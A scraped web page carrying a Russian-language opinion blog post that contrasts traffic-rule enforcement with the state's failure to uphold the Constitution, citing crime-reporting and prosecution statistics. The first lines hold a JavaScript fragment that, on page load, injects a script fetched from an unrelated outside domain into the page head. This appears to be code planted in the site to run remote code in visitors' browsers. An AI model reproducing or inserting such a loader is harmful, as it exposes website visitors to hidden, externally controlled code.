, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему мы к Конституции относимся хуже, чем к Правилам дорожного движения?

04 Ноя

Правила дорожного движения (ПДД) устанавливают единый порядок дорожного движения на всей территории России.

Конституция России устанавливает единый порядок жизни и управления страной.

Статистика утверждает http://www.1gai.ru/autonews/520130-gibdd-opublikovala-godovuyu-statistiku-dtp-za-2017-god.html   , что из-за нарушения ПДД  только за один 2017 год страна потеряла погибшими 19 тыс. человек, было ранено более 215 тыс. человек.

Нам есть, что улучшать. Смертность на дорогах страны, согласно статистическим данным, выше, чем в странах Европы в 3−4 раза!

А, что же происходит при нарушении требований Конституции России, в которой утверждается, что Человек, его права и свободы являются высшей ценностью?

Проведенные исследования показывают, что  лица, осуществляющие государственную власть, не стремятся признавать, соблюдать и защищать права и свободы человека и гражданина. Они фактически игнорируют требования Основного Закона страны.

Так, доктор юридических наук Пётр Скобликов считает http://soprotivlenie.org/news/krupnym-planom/22−1/  , что одной из самых серьезных проблем современного уголовного судопроизводства является ограничение доступа к правосудию лиц, пострадавших от преступлений, прежде всего путем необоснованных и незаконных отказов в возбуждении уголовного дела"

Исследования доктора юридических наук Александра Смирнова доказывают http://rapsinews.ru/judicial_analyst/20141202/272697983.html  , что только 6% пострадавших от преступлений могут рассчитывать на защиту правоохранительных органов

Поэтому ежегодно более 9 миллионов человек, пострадавших от преступлений не могут получить статус «потерпевший», из-за того, что по их заявлениям не возбуждают уголовные дела.

Даже Генеральный прокурор Юрий Чайка ещё недавно аргументировано  утверждал https://rg.ru/2015/01/12/chaika.html : «Действительно, всеми органами предварительного расследования закон нередко нарушается еще до возбуждения уголовного дела. Ежегодно прокуроры выявляют массу случаев, когда людям отказывают в приеме их заявлений о преступлениях при наличии бесспорных поводов и оснований для возбуждения уголовного дела. Отмененные прокурорами постановления об отказе в возбуждении уголовного дела исчисляются миллионами. Нередко нарушаются правила проведения оперативно-розыскных мероприятий, причем зачастую вследствие незнания закона. Много нарушений допускается и при производстве предварительного расследования.

Всего за 10 месяцев 2014 года прокурорами выявлено 4,4 миллиона нарушений закона на стадии досудебного производства. Из них значительная часть — 2,9 миллиона допущены в рамках приема и рассмотрения сообщений о преступлениях».

 

Но нас последние годы пытаются убедить, а фактически дурить, в том, что криминальная деятельность в стране снижается.

Причина такого явления находит своё объяснение в следующем.

Из статистического сборника «Состояние преступности в России», публикуемого на сайте МВД России для всеобщего доступа, в 2015 году исключен раздел «Сведения о результатах разрешения заявлений, сообщений и иной информации о происшествиях в органах внутренних дел».

Вот, что в связи с этим  отмечается http://soprotivlenie.org/doc/rekomendacii-obshhestvennoj-palaty-rossijskoj-federacii-po-itogam-kruglogo-stola-na-temu-realizaciya-principov-ugolovnoj-politiki-v-sfere-zashhity-prav-postradavshix-ot-prestupnyx-posyagatelstv/     в Рекомендации Общественной палаты Российской Федерации по итогам круглого стола на тему: «Реализация принципов уголовной политики в сфере защиты прав пострадавших от преступных посягательств» от 28 марта 2017 года

«Этот раздел являлся важным источником информации по соответствующей теме, поскольку именно в органах МВД России выявляется до 95 % преступлений, регистрируемых в России. Также вызывает вопрос, почему заявления (сообщения) о преступлениях учитываются вместе с заявлениями (сообщениями) об административных правонарушениях и происшествиях. В результате обществу неизвестна судьба примерно 28 миллионов заявлений и сообщений, поступивших в органы внутренних дел в течение года, каждое из которых могло содержать сведения о совершенном преступлении». Нет данных о преступности, и любое приукрашивания борьбы с ней становится возможным, а это значит, новые звания, премии…»

Поэтому официальная  доступная нам статистика утверждает, что  криминальных сообщений  около двух миллионов, поскольку столько возбуждается  уголовных дел, из которых около миллиона направляется в суд, где 500−700 тысяч осуждают без исследования и оценки доказательств, собранных по уголовному делу. Достаточным доказательством по этим делам является согласие обвиняемого с предъявленным ему обвинением.

Об этой «картине маслом»  не может не ведать гарант Конституции Владимир Путин. Уверен, что ведает.  Его дурят, но  он молчит, давая тем самым согласие на публикацию сведений, что не соответствуют действительности, что явно свидетельствуют о неправосудном судопроизводстве в стране.

А, что происходит в тех случаях, когда гарант Конституции всё же публично говорит об игнорировании его назначенцами правил жизни по требованиям Конституции?

Так, обращаясь http://kremlin.ru/events/president/news/50864   к Федеральному Собранию с ежегодным Посланием, Путин отметил:

«За 2014 год следственными органами возбуждено почти 200 тысяч уголовных дел по так называемым экономическим составам. До суда дошли 46 тысяч из 200 тысяч, ещё 15 тысяч дел развалилось в суде. Получается, если посчитать, что приговором закончились лишь 15 процентов дел. При этом абсолютное большинство, около 80 процентов, 83 процента предпринимателей, на которых были заведены уголовные дела, полностью или частично потеряли бизнес. То есть их попрессовали, обобрали и отпустили».

При этом Путин не решился назвать тех,  кто это сделал, под чьим неусыпным контролем и  надзором всё это самовластие происходило.

А в это самое время в судебном департаменте Верховного Суда РФ (ВС) велись подсчёты http://tass.ru/ekonomika/3825472     работы по предпринимателям уже за 2015 г. Оказалось, что  в этот раз обобрали ещё больше. Из более чем 230 тыс. уголовных дел, возбужденных в сфере экономических преступлений, до суда дошло только чуть меньше 35 тыс. уголовных дел.

Таким образом, на протяжении двух лет около 400 000 предпринимателей, обобрали, лишив их бизнеса, но никто за такой произвол не ответил.

Фактически на протяжении третьего десятилетия, игнорируя требования Конституции России, ежегодно  калечатся судьбы сотен тысяч законопослушных и деятельных  россиян  именно теми, кто обязан их защищать. Ежегодно миллионы пострадавших от преступлений не получают защиты  правоохранительных органов, из-за того, что «людям отказывают в приеме их заявлений о преступлениях при наличии бесспорных поводов и оснований для возбуждения уголовного дела».

В Основном Законе страны четко прописано, кто обязан наладить государственное управление и исполнение законов — Президент России, которым уже 18 лет является Владимир Путин, четырежды клятвенно обещавший соблюдать и защищать Конституцию России.

Если за нарушение ПДД, как правило, устанавливается виновный, и он несёт уголовную или административную ответственность, то за необеспечение исполнения требований Конституции, никто никакой ответственности за все эти годы не понёс.

Более того, большинство россиян, посчитало, что этого делать и не надо, избрав Путина на очередной срок гарантом Конституции.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.